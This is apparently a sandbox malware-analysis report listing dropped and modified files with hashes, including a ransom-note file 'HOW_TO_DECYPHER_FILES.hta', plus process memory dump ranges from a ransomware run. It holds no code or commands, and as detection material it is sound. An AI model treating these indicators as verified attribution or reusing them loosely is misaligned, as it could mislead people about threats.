7952bff5755ac1d2b53965a251c11795826c37b8f3c247cfe943ee4100d6847677610a63e42e9f83c7fa05535d3c602246d75dc0f2d8fa131be77c96996ebe08

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\datareporting\glean\pending_pings\7d09eec9-2c5a-48c9-9356-417cc8db208f

Filesize
734B

MD5
7f67455097bbbe0bd8e69c4b559ca3c6

SHA1
eeede5f5b2bb049f9a82200610ce3e610501be23

SHA256
d0c0cfa8c4ac915dd12ce0bc1d269721d8ae7441396016725f14afbaa3822d0a

SHA512
c3f33493540213c869c7fb80827343c8195f775a376ad10e6b875497835cc89e56ada5671fb9e4b539470aa6e6578152216dc8a0131d019e20ce3a52bd471194

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

Filesize
997KB

MD5
fe3355639648c417e8307c6d051e3e37

SHA1
f54602d4b4778da21bc97c7238fc66aa68c8ee34

SHA256
1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

SHA512
8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\prefs-1.js

Filesize
6KB

MD5
d0f2727376396f1c5e462b9eec104f60

SHA1
c712d913a5c26f6115629e7965df831dc185c69f

SHA256
4e706b46886f8986d3c606d04172603d6a79a67015216e07a5748831710232f6

SHA512
eb3bd0b8df9c0af655e28e1b81bd2b16ffa065b5cbf2219eccc2d99886212e06f34a42dc419aa80c4a5c20b55485d1f7a8a5598f4198322530bb5c63381fb9a2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\prefs-1.js

Filesize
6KB

MD5
a66c8c11930cb9353c684dbb495adedc

SHA1
af66b358286c257f26df5239c7c2f7c576799555

SHA256
fc1d5b2d69c2e9846c71c10f83fe57842f8ffaddeea181852f5746427445eaf6

SHA512
1d9674eb1ea5aa506a1bcc694af60197f26310e8b7b71c3dfc3a8a228737b81097891725cd7933d61e2d5c2ec44566718e675a41514119e92600e831598f9657

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
296c5b6e66f13c86d9bafa00452077e7

SHA1
d9c164beadcb54b56aa7d82d3f27e93f4d5efcef

SHA256
ea30c5b559a84530768693deea1c9a8bc1d2b299007619562f4fb1dc38fe122a

SHA512
1a6d1e4f931dd7bc59bf93bbadde8c248acad2a27c9e46effe54c6ded5d6f69d5eff990c1f426a8d7036c5d6f1741a1f50fe58eeed20b31cba751b22641586f2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7jdwo0d.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
219799a85707d3f741163427ae2890df

SHA1
41ab76829421a2e78def384e0ce6a73730ecc6ae

SHA256
1cda5c7dea57f217d776c0e6ea5e206f7b29e09b100b98bdb74fc0ba9bc36f7a

SHA512
21ce57917016e81d571abfbbfc60b91dcc5c90d6f843a47933d4ad4300531578872c29825a899b285141284a88b8a7abb33106b4a322cb56e32332c49971c313

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

Filesize
1KB

MD5
6ba5f129601ccdb9db83c09c019bcc41

SHA1
28ee2d24bceccb2a558f4c457c3eed7ae46dae0d

SHA256
8fda1fa2f4f670ebfb0532ceec094a5543e9999d012bf1f28f496b9f6229a661

SHA512
d7a9c40d25054b6f2be08c06c3801d7d716571a248aee1f5fe966a554f682d9d5308815b84f44877d00b58a078a0ee88467576acdcc04c5a365206b7fe879cb8

Download Submit
memory/560-137-0x00000235B2680000-0x00000235B2690000-memory.dmp

Filesize
64KB

Download
memory/560-135-0x00000235B2680000-0x00000235B2690000-memory.dmp

Filesize
64KB

Download
memory/560-133-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/1208-131-0x000001F638CA0000-0x000001F638CB0000-memory.dmp

Filesize
64KB

Download
memory/1208-112-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/1392-67-0x000001EC70C20000-0x000001EC70C30000-memory.dmp

Filesize
64KB

Download
memory/1392-317-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/1392-215-0x000001EC70C20000-0x000001EC70C30000-memory.dmp

Filesize
64KB

Download
memory/1392-68-0x000001EC70C20000-0x000001EC70C30000-memory.dmp

Filesize
64KB

Download
memory/1392-59-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/1404-109-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/1404-128-0x00000210FB0D0000-0x00000210FB0E0000-memory.dmp

Filesize
64KB

Download
memory/1404-129-0x00000210FB0D0000-0x00000210FB0E0000-memory.dmp

Filesize
64KB

Download
memory/1984-101-0x000002445ADC0000-0x000002445ADD0000-memory.dmp

Filesize
64KB

Download
memory/1984-97-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/1984-413-0x000002445ADC0000-0x000002445ADD0000-memory.dmp

Filesize
64KB

Download
memory/1984-331-0x000002445ADC0000-0x000002445ADD0000-memory.dmp

Filesize
64KB

Download
memory/1984-88-0x000002445ADC0000-0x000002445ADD0000-memory.dmp

Filesize
64KB

Download
memory/2828-103-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/2828-126-0x000002654AFC0000-0x000002654AFD0000-memory.dmp

Filesize
64KB

Download
memory/2828-106-0x000002654AFC0000-0x000002654AFD0000-memory.dmp

Filesize
64KB

Download
memory/3504-86-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/3504-337-0x0000011A9F240000-0x0000011A9F250000-memory.dmp

Filesize
64KB

Download
memory/3504-91-0x0000011A9F240000-0x0000011A9F250000-memory.dmp

Filesize
64KB

Download
memory/3504-89-0x0000011A9F240000-0x0000011A9F250000-memory.dmp

Filesize
64KB

Download
memory/3504-377-0x0000011A9F240000-0x0000011A9F250000-memory.dmp

Filesize
64KB

Download
memory/3504-369-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/3520-346-0x00000245F8540000-0x00000245F8550000-memory.dmp

Filesize
64KB

Download
memory/3520-62-0x00000245F8540000-0x00000245F8550000-memory.dmp

Filesize
64KB

Download
memory/3520-55-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/3520-323-0x00000245F8540000-0x00000245F8550000-memory.dmp

Filesize
64KB

Download
memory/3520-255-0x00000245F8540000-0x00000245F8550000-memory.dmp

Filesize
64KB

Download
memory/3520-64-0x00000245F8540000-0x00000245F8550000-memory.dmp

Filesize
64KB

Download
memory/3520-311-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/3696-214-0x000000001B9E0000-0x000000001B9F0000-memory.dmp

Filesize
64KB

Download
memory/3696-0-0x0000000000DB0000-0x0000000000DCA000-memory.dmp

Filesize
104KB

Download
memory/3696-2-0x000000001B9E0000-0x000000001B9F0000-memory.dmp

Filesize
64KB

Download
memory/3696-1-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/3696-121-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/3844-124-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/3844-127-0x000002662F810000-0x000002662F820000-memory.dmp

Filesize
64KB

Download
memory/4036-389-0x000001FF6E5B0000-0x000001FF6E5C0000-memory.dmp

Filesize
64KB

Download
memory/4036-354-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/4036-227-0x000001FF6E5B0000-0x000001FF6E5C0000-memory.dmp

Filesize
64KB

Download
memory/4036-74-0x000001FF6E5B0000-0x000001FF6E5C0000-memory.dmp

Filesize
64KB

Download
memory/4036-93-0x000001FF6E5B0000-0x000001FF6E5C0000-memory.dmp

Filesize
64KB

Download
memory/4036-72-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/4432-7-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/4432-26-0x000001A748580000-0x000001A748590000-memory.dmp

Filesize
64KB

Download
memory/4432-50-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/4432-9-0x000001A748550000-0x000001A748572000-memory.dmp

Filesize
136KB

Download
memory/4432-13-0x000001A748810000-0x000001A748886000-memory.dmp

Filesize
472KB

Download
memory/4432-8-0x000001A748580000-0x000001A748590000-memory.dmp

Filesize
64KB

Download
memory/4432-10-0x000001A748580000-0x000001A748590000-memory.dmp

Filesize
64KB

Download
memory/4772-363-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/4772-77-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/4772-80-0x0000020DF39B0000-0x0000020DF39C0000-memory.dmp

Filesize
64KB

Download
memory/4772-82-0x0000020DF39B0000-0x0000020DF39C0000-memory.dmp

Filesize
64KB

Download
memory/4772-408-0x0000020DF39B0000-0x0000020DF39C0000-memory.dmp

Filesize
64KB

Download
memory/4772-395-0x0000020DF39B0000-0x0000020DF39C0000-memory.dmp

Filesize
64KB

Download
memory/4772-282-0x0000020DF39B0000-0x0000020DF39C0000-memory.dmp

Filesize
64KB

Download
memory/4776-116-0x00007FFCAA3B0000-0x00007FFCAAD9C000-memory.dmp

Filesize
9.9MB

Download
memory/4776-134-0x00000144F9760000-0x00000144F9770000-memory.dmp

Filesize
64KB

Download
memory/4776-140-0x00000144F9760000-0x00000144F9770000-memory.dmp

Filesize
64KB

Download